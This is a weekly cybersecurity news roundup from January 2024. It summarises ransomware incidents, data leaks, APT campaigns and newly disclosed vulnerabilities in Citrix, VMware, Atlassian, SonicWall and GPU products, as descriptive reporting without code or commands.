Thursday, January 18th, 2024

Cybersecurity Week in Review (19/01/24)

167K People Exposed in Sweden Coop Data Leak

Ransomware gang Cactus says it has released data belonging to 167,000 people connected to Swedish grocery chain Coop after apparently failing to reach an agreement. The company has admitted to being breached in a cyberattack, but insists that it never received a demand for payment.

Ransomware gang Cactus took credit for last month’s attack and has not been idle with the stolen data – an update on its dedicated leaks website dated January 18th says that it has released the entire haul of 257GB.

Such tactics are commonplace among ransomware criminal outfits, which aim to leverage target organizations by making good on threats to share compromising data in the hope of compelling them to pay a demanded fee.

In this case, it would appear that Cactus has simply decided to cut its losses and shore up its reputation by releasing the data. The original cyberattack dates back to before Christmas, but the data disclosure was made by Cactus on January 18th.

However, in a curious twist, Coop appears to have told local media that it never received a demand for ransom payment – unusual in such cases.

“No demands have been received, we have not perceived any such either,” said a spokesperson. “We have never planned to pay anything that finances criminal activity either.”

For its part, Cactus claims to have “100% disclosed” the data, suggesting that the entire trove has been released into the wild.

According to local media in Sweden, the exposed data includes Social Security numbers, physical addresses, emails, and phone numbers. The 167,000 people exposed in the attack are thought to include customers, employees, and union members – Coop, which operates some 800 stores in Sweden, is founded on principles of collective public ownership.

Coop said the attack took place on December 22nd, affecting card payments as well as undermining its core computer network, which also compromised its email and telephone connections.

Cyber watchdog Falcon Feedsio confirmed a week later that Coop had been a victim of Cactus, along with Bell Group in the UK and Tridon Australia.

Coop insists it has seen no evidence to suggest the stolen data has been used – but that will be of little comfort to victims, given that such information can be traded down the line on dark web forums and might lie fallow for an extended period of time before being exploited by other criminals online.

Source –

Feds Warn of AndroxGh0st Botnet Targeting AWS, Azure, and Office 365 Credentials

CISA and the FBI warned that threat actors deploying the AndroxGh0st malware are creating a botnet for “victim identification and exploitation in target networks.”

A Python-based malware, AndroxGh0st was first documented in December 2022, with the malware inspiring several similar tools like AlienFox, GreenBot (aka Maintance), Legion, and Predator.

The cloud attack tool is capable of infiltrating servers vulnerable to known security flaws to access Laravel environment files and steal credentials for high-profile applications such as Amazon Web Services (AWS), Microsoft Office 365, SendGrid, and Twilio. Some of the notable flaws weaponized by the attackers include CVE-2017-9841 (PHPUnit), CVE-2021-41773 (Apache HTTP Server), and CVE-2018-15133 (Laravel Framework).

AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of web shells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute-force attacks.

The compromised AWS credentials are subsequently used to create new users and user policies, and in several instances, set up new AWS instances for additional, malicious scanning activity.

These features make AndroxGh0st a potent threat that can be used to download additional payloads and retain persistent access to compromised systems.

The development arrives less than a week after it was revealed a related-but-distinct tool called FBot is being employed by attackers to breach web servers, cloud services, content management systems (CMS), and SaaS platforms.

It also follows an alert about a significant spike in botnet scanning activity since mid-November 2023, touching a peak of nearly 1.3 million distinct devices on January 5, 2024. A majority of the source IP addresses are associated with the U.S., China, Vietnam, Taiwan, and Russia.

Analysis of the activity has uncovered a rise in the use of cheap or free cloud and hosting servers that attackers are using to create botnet launch pads. These servers are used via trials, free accounts, or low-cost accounts, which provide anonymity and minimal overhead to maintain.

Source –

Microsoft: Iranian Hackers Target Researchers with New MediaPl Malware

Microsoft says that a group of Iranian-backed state hackers are targeting high-profile employees of research organizations and universities across Europe and the United States in spearphishing attacks pushing new backdoor malware.

The attackers, a subgroup of the notorious APT35 Iranian cyberespionage group (also known as Charming Kitten and Phosphorus) linked to the Islamic Revolutionary Guard Corps (IRGC), sent custom-tailored and difficult-to-detect phishing emails via previously compromised accounts.

“Since November 2023, Microsoft has observed a distinct subset of Mint Sandstorm (PHOSPHORUS) targeting high-profile individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the United Kingdom, and the United States,” Microsoft said.

“In this campaign, Mint Sandstorm used bespoke phishing lures in an attempt to socially engineer targets into downloading malicious files. In a handful of cases, Microsoft observed new post-intrusion tradecraft including the use of a new, custom backdoor called MediaPl.”

The MediaPl malware uses encrypted communication channels to exchange information with its command-and-control (C2) server and is designed to masquerade as Windows Media Player to evade detection.

Communications between MediaPl and its C2 server use AES CBC encryption and Base64 encoding, and the variant discovered on compromised devices comes with the ability to auto-terminate, temporarily halt, retry C2 communications, and execute C2 commands using the _popen function.

A second PowerShell-based backdoor malware known as MischiefTut helps drop additional malicious tools and provides reconnaissance capabilities, allowing the threat actors to run commands on the hacked systems and send the output to attacker-controlled servers.

​This APT35 subset focuses on attacking and stealing sensitive data from the breached systems of high-value targets. It is known for previously targeting researchers, professors, journalists, and other individuals with knowledge of security and policy issues aligning with Iranian interests.

“These individuals, who work with or who have the potential to influence the intelligence and policy communities, are attractive targets for adversaries seeking to collect intelligence for the states that sponsor their activity, such as the Islamic Republic of Iran,” Microsoft said.

“Based on the identities of the targets observed in this campaign and the use of lures related to the Israel-Hamas war, it’s possible this campaign is an attempt to gather perspectives on events related to the war from individuals across the ideological spectrum.”

Between March 2021 and June 2022, APT35 backdoored at least 34 companies with previously unknown Sponsor malware in a campaign that targeted government and healthcare organizations, as well as firms in the financial services, engineering, manufacturing, technology, law, telecommunications, and other industry sectors.

The Iranian hacking group also used never-before-seen NokNok malware in attacks against macOS systems, another backdoor designed to collect, encrypt, and exfiltrate data from compromised Macs.

Another Iranian threat group tracked as APT33 (aka Refined Kitten or Holmium) breached defense organizations in extensive password spray attacks targeting thousands of orgs worldwide since February 2023 and was also recently seen attempting to breach defense contractors with new FalseFont malware.

Source –

Russian-web Provider Qwerty Down, Ukraine’s IT Army Takes Credit

The IT Army of Ukraine claims to have taken down the Moscow-based internet provider Qwerty in its latest attack on the Kremlin – the second time a major Russian telecom service has been hit in less than a week. Ukraine’s pseudo-official hacker group boasting of the three day-long attack on its Telegram channel Tuesday.

“In Moscow, it’s not only cold, but also, there’s no internet,” The IT Army posted in both Russian and English.

“Qwerty, one of the largest internet providers in the enemy’s capital, has been unable to restore service for three days due to our attack,” it said.

“Rest assured, it’s used not only by civilians, but also by various special services in the city.“

The post continued to chide Qwerty’s parent company, Rostelecom, and another of its subsidiaries Central Telegraph, for failing to stop the attack.

“Central telegraph announced the return of telegraph services instead of providing internet. Just kidding, of course, but it sounds like a decent Plan B for a country built on caveman principles,” the hacker collective said.

The global internet monitoring site NetBlocks confirmed that Qwerty service was down for Russian users, showing the most severe drop in connectivity happening around January 15th.

According to Ukraine’s Kyiv Post, Qwerty had registered at least 127 crashes in Moscow over the last 24 hours, followed by a series of complaints from Russian users, according to the Russian web monitoring site DownRadar.

Russian telecom service, M9com, suffered a similar attack on January 9th, also reported by NetBlocks. That attack was reported to be carried out by another hacktivist group known as the BlackJack group, also said to be connected to Ukraine’s law enforcement and intelligence arm, the Security Service of Ukraine (SSU).

Sources said the Blackjack hack knocked out internet and television services for about half the population of Moscow. The hit was said to be in retaliation for Russia’s mid-December attack on Kyivstar, one of Ukraine’s largest telecom providers, causing an outage for more than half of the war-torn nation for nearly a week.

The BlackJack group claimed that the M9com cyberattack was just a “warm-up” and Russia should expect another larger attack in the future.

Source –

Citrix, VMware, and Atlassian Hit with Critical Flaws

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild.

The flaws are listed below –

  • CVE-2023-6548 (CVSS score: 5.5) – Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management interface access)
  • CVE-2023-6549 (CVSS score: 8.2) – Denial-of-service (requires that the appliance be configured as a Gateway or authorization and accounting, or AAA, virtual server)

The following customer-managed versions of NetScaler ADC and NetScaler Gateway are impacted by the shortcomings –

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21
  • NetScaler ADC and NetScaler Gateway version 12.1 (currently end-of-life)
  • NetScaler ADC 13.1-FIPS before 13.1-37.176
  • NetScaler ADC 12.1-FIPS before 12.1-55.302, and
  • NetScaler ADC 12.1-NDcPP before 12.1-55.302

“Exploits of these CVEs on unmitigated appliances have been observed,” Citrix said, without sharing any additional specifics. Users of NetScaler ADC and NetScaler Gateway version 12.1 are recommended to upgrade their appliances to a supported version that patches the flaws.

It’s also advised to not expose the management interface to the internet to reduce the risk of exploitation. In recent months, multiple security vulnerabilities in Citrix appliances (CVE-2023-3519 and CVE-2023-4966) have been weaponized by threat actors to drop web shells and hijack existing authenticated sessions.

The disclosure comes as VMware alerted customers of a critical security vulnerability in Aria Automation (previously vRealize Automation) that could allow an authenticated attacker to gain unauthorized access to remote organizations and workflows.

The issue has been assigned the CVE identifier CVE-2023-34063 (CVSS score: 9.9), with the Broadcom-owned virtualization services provider describing it as a “missing access control” flaw.

The versions impacted by the vulnerability are provided below –

  • VMware Aria Automation (8.11.x, 8.12.x, 8.13.x, and 8.14.x)
  • VMware Cloud Foundation (4.x and 5.x)

“The only supported upgrade path after applying the patch is to version 8.16,” VMware said. “If you upgrade to an intermediate version, the vulnerability will be reintroduced, requiring an additional round of patching.”

The development also follows Atlassian’s release of patches for over two dozen vulnerabilities, including a critical remote code execution (RCE) flaw impacting Confluence Data Center and Confluence Server.

The vulnerability, CVE-2023-22527, has been assigned a CVSS score of 10.0, indicating maximum severity. It affects versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0-8.5.3. It’s worth noting that 7.19.x LTS versions are not affected by the vulnerability.

The issue has been addressed in versions 8.5.4, 8.5.5 (Confluence Data Center and Server), 8.6.0, 8.7.1, and 8.7.2 (Data Center only). Users who are on out-of-date instances are recommended to update their installations to the latest version available.

Source –

AI Data Exposed to ‘LeftoverLocals’ Attack via Vulnerable AMD, Apple, Qualcomm GPUs

Researchers have demonstrated how a new attack method leveraging a vulnerability in graphics processing units (GPUs) could be exploited to obtain potentially sensitive information from AI and other types of applications. The vulnerability, dubbed LeftoverLocals is officially tracked as CVE-2023-4969.

Tests conducted showed that Apple, AMD and Qualcomm GPUs are affected. In addition, some GPUs from Imagination Technologies are impacted as well. Products from Arm, Intel, and Nvidia do not appear to be affected. 

Qualcomm and Apple have started releasing patches and AMD has published an advisory informing customers that it plans on releasing mitigations in March 2024, but noted that they will not be enabled by default. 

The LeftoverLocals vulnerability exists because some GPUs fail to properly isolate process memory. This could allow a local attacker to obtain sensitive information from a targeted application. For instance, a malicious app installed on the targeted device may be able to exploit the vulnerability to read GPU memory associated with another application, which could contain valuable data.

GPUs were originally developed for graphics acceleration, but they are now used for a wider range of applications, including artificial intelligence.  

The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal. These frameworks are well-supported and typically do not require escalated privileges. Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code.

The researchers demonstrated how an attacker could use LeftoverLocals to create covert channels on iPhones, iPads and Android devices, and they also developed a proof-of-concept that shows how an attacker could listen in on the victim’s conversation with an LLM application, specifically an AI chatbot.

They showed how an attacker could leverage leaked GPU memory to stealthily obtain the responses given by the chatbot to the user.

An attack program must be co-resident on the same machine and must be ‘listening’ at the same time that the victim is running a sensitive application on the GPU. This could occur in many scenarios: for example, if the attack program is co-resident with the victim on a shared cloud computer with a GPU. On a mobile device, the attack could be implemented in an app or a library. Listening can be implemented efficiently, and thus can be done repeatedly and constantly with almost no obvious performance degradation.

Source –

Leaked COVID Tests Expose Sensitive Patient Data

The COVID-19 testing platform,, has exposed a database containing 11.8 million patient records, including COVID-19 certificates, test records, passport numbers, and other sensitive details., a Dutch online platform for Covid-19 testing, left a misconfigured Google Cloud Storage bucket with 1.7 million files, covering 11.7 million records on individuals from 44 countries.

The open bucket was dubbed “prod,” suggesting that Coronalab used it to store and manage data used in their operational and production IT environments. The team discovered the open bucket in late November, with Coronalab fixing the issue after being contacted.

Researchers claim that among the nearly 2 million exposed files, they’ve discovered 120K Covid certificates in QR code formats and 32K comma-separated values (CSV) files with over 11.7 million Covid test results.

The exposed documents cover a period from 2020 until 2022. The leak exposed a trove of sensitive and personally identifiable user data, including:

  • Patients’ names
  • Nationality
  • Dates of birth
  • Passport numbers
  • Covid test results
  • Email addresses
  • Phone numbers
  • Destination country if the test was taken for traveling reasons

The majority of leaked data likely belonged to Dutch nationals, as almost 89% of total leaked phone numbers came from the Netherlands. A further 1.5% were UK-based, 1.2% were from the USA, 0.8% were from Germany, and 0.8% were from Italy.

According to the team, disclosing sensitive personal data puts individuals at risk, as leaked details can be used for various nefarious purposes, such as targeted phishing attacks, fraud, or identity theft.

“Information security principles, particularly confidentiality, are critical in healthcare. A leak of coronavirus test results indicates a breach of confidentiality, indicating a failure in safeguarding sensitive medical information,” researchers said.

Since the Netherlands is governed by European Union law, the General Data Protection Regulation (GDPR) applies to how companies handle data. Meanwhile, sharing personal information, such as an individual’s name, address, date of birth, or other contact details without consent, could be considered a GDPR violation.

To mitigate the problems and avoid similar issues in the future, the team advises to:

  • Change the access controls to restrict public access and secure the bucket. Update permissions to ensure that only authorized users or services have the necessary access.
  • Conduct a thorough audit of the access controls for the bucket. Review IAM (Identity and Access Management) policies and permissions assigned to users and service accounts. Make sure that the principle of least privilege is followed.
  • Monitor retrospectively access logs to assess whether the bucket has been accessed by unauthorized actors.
  • Consider encrypting both data in transit and data at rest. Features like server-side encryption offered by Google Cloud Storage can improve the security of the data that is stored.
  • Consider implementing security best practices, including regular audits, automated security checks, and employee training.

Source –

Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits

Over 178,000 SonicWall firewalls exposed over the internet are exploitable to at least one of the two security flaws that could be potentially exploited to cause a denial-of-service (DoS) condition and remote code execution (RCE). The two issues are fundamentally the same but exploitable at different HTTP URI paths due to reuse of a vulnerable code pattern.

The vulnerabilities in question are listed below –

  • CVE-2022-22274 (CVSS score: 9.4) – A stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote, unauthenticated attacker to cause DoS or potentially result in code execution in the firewall.
  • CVE-2023-0656 (CVSS score: 7.5) – A stack-based buffer overflow vulnerability in the SonicOS allows a remote, unauthenticated attacker to cause DoS, which could result in a crash.

While there are no reports of exploitation of the flaws in the wild, a proof-of-concept (PoC) for CVE-2023-0656 was published by the SSD Secure Disclosure team in April 2023.

The issues could be weaponized by bad actors to trigger repeated crashes and force the appliance to get into maintenance mode, requiring administrative action to restore normal functionality.

Perhaps most astonishing was the discovery that over 146,000 publicly-accessible devices are vulnerable to a bug that was published almost two years ago.

The development comes as watchTowr Labs uncovered multiple stack-based buffer overflow flaws in the SonicOS management web interface and SSL VPN portal that could lead to a firewall crash.

To safeguard against possible threats, it’s recommended to update to the last version and ensure that the management interface isn’t exposed to the internet.

Source –

Majorca City Calvià Extorted for $11M in Ransomware Attack

The Calvià City Council in Majorca announced it was targeted by a ransomware attack on Saturday, which impacted municipal services. Calvià is a historic town on the Spanish island of Majorca with a population of 50,000 and is one of Majorca’s major tourism hotspots, estimated to receive 1.6 million visits annually.

During the weekend, a cyberattack hit Calvia’s systems, forcing the council to form a crisis committee to evaluate the damage done and formulate impact mitigation plans.

“The Calvià City Council is working to restore normality as soon as possible, after having been the target, in the early hours of last Saturday, of a ransomware cyberattack, through which they intend to extort the council,” says the announcement from Calvià.

Mayor Juan Antonio Amengual stated that a team of IT specialists is currently performing forensic analysis to estimate the extent of unauthorized access and recover the impacted systems and services.

The IT outages have caused the City to suspend any administrative deadline for submitting allegations, requests, etc, until January 31, 2024. Citizens who urgently need to submit any document for registration can still do it through the General State Administration portal.

In the meantime, the municipality has informed the police’s cybercrime department about the incident and filed the necessary complaints along with preliminary forensic analysis information.

The announcement concludes with a statement of regret for the inconvenience, reminding people that citizen services can still be reached via the phone.

“The City Council deeply regrets the inconvenience this situation may cause and reiterates its firm commitment to resolve the current situation in the most orderly, quick, and efficient manner possible,” reads the statement. (machine translated)

“In any case, telephone and face-to-face communication is maintained normally.”

By the time of writing this, none of the major ransomware groups had assumed responsibility for the attack at Calvià, so the perpetrators remain unknown. However, a local media outlet has learned that the ransom set by the cybercriminals is €10,000,000, approximately $11M.

The mayor told the local press that the municipality would not be paying the ransom under any circumstances.

Ransomware poses a significant risk to entities of all sizes, including small towns, highlighting a growing concern in today’s digital landscape. Such attacks can put vital municipal services out of order, leading to major disruptions in daily operations and public services. The repercussions would be even more severe if such an attack occurred during peak tourism season.

Source –

US Court Docs Expose Fake Antivirus Renewal Phishing Tactics

In a seizure warrant application, the U.S. Secret Service sheds light on how threat actors stole $34,000 using fake antivirus renewal subscription emails.

The now-executed seizure warrant was submitted by Special Agent Jollif of the United States Secret Service (USSS) to recover funds stolen in a fake Norton subscription renewal email that led to the threat actor gaining access to a victim’s PC and bank account.

According to the court document submitted by a Special Agent of the United States Secret Service, the stolen money is stored in a Chase bank account belonging to someone named “Bingsong Zhou,” associated with phishing scams impersonating Norton Antivirus renewal subscriptions.

These phishing emails claim that the recipient is about to be charged for renewing an antivirus subscription license and to call the enclosed number to cancel it. The victim calls the phone number listed on the email, and from there, the scammers direct them to perform various actions such as installing remote access software on their computers, infecting themselves with malware, and entering their account credentials on a phishing page.

This type of scam has been ongoing for many years, but Jollif stated that the activity has recently risen to higher volumes.

One case highlighted in the court document mentions a victim who received a phishing email on November 28, 2023, alleging that he would be charged $349.95 for a Norton antivirus subscription unless he canceled the charge.

While the court document does not show the phishing email received in this attack, it is likely similar to the one shown below that was seen in past attacks.

After calling the scammers, the victim was tricked into giving them remote access to his laptop, supposedly needed to ensure the $349.95 was refunded to his account. At that point, the scammer alleged that $34,000 was refunded by error, and the victim was asked to return the amount to avoid legal trouble. The victim complied with the instruction, seeing that his checking account now had a new $34,000 deposit that he assumed originated from Norton.

In reality, the scammer had overlaid a blue screen on the monitor so the victim couldn’t see his actions and transferred $34,000 from the victim’s own Money Market (savings) account to their checking balance.

After the fraudulent activity was identified, on December 7, JP Morgan Chase restricted Zhou’s access to the funds in his accounts, and these funds were moved to a suspense account controlled by the bank.

Jollif’s application seeks to seize the $34,000 derived from Zhou’s activities, considering it potentially criminal proceeds. Zhou now faces charges of wire fraud and involvement in a phishing scam and might also be charged with possible money laundering, bank fraud, and conspiracy to commit wire fraud.

Source –

New Findings Challenge Attribution in Denmark’s Energy Sector Cyberattacks

Cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings show.

The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a follow-on activity cluster that saw the attackers deploy Mirai botnet variants on infected hosts via an as-yet-unknown initial access vector.

The first wave took place on May 11, while the second wave lasted from May 22 to 31, 2023. In one such attack detected on May 24, it was observed that the compromised system was communicating with IP addresses (217.57.80[.]18 and 70.62.153[.]174) that were previously used as command-and-control (C2) for the now-dismantled Cyclops Blink botnet.

Closer examination of the attack campaign, however, has revealed that not only were the two waves unrelated, but also unlikely the work of the state-sponsored group owing to the fact the second wave was part of a broader mass exploitation campaign against unpatched Zyxel firewalls. It’s currently not known who is behind the twin sets of attacks.

There is evidence to suggest that the attacks may have started as early as February 16 using other known flaws Zyxel devices (CVE-2020-9054 and CVE-2022-30525) alongside CVE-2023-28771, and persisted as late as October 2023, with the activity singling out various entities across Europe and the U.S.

This is further evidence that exploitation of CVE-2023-27881, rather than being limited to Danish critical infrastructure, is ongoing and targeting exposed devices, some of which just happen to be Zyxel firewalls safeguarding critical infrastructure organizations.

Cyber attacks are difficult to attribute to a specific threat actor and there is no concrete evidence to accuse Russia of being involved in the attack.

Source –


Contact Us

The data you supply here will not be added to any mailing list or given to any third party providers without further consent. View our Privacy Policy for more information.

    Copyright Smarttech247 - 2021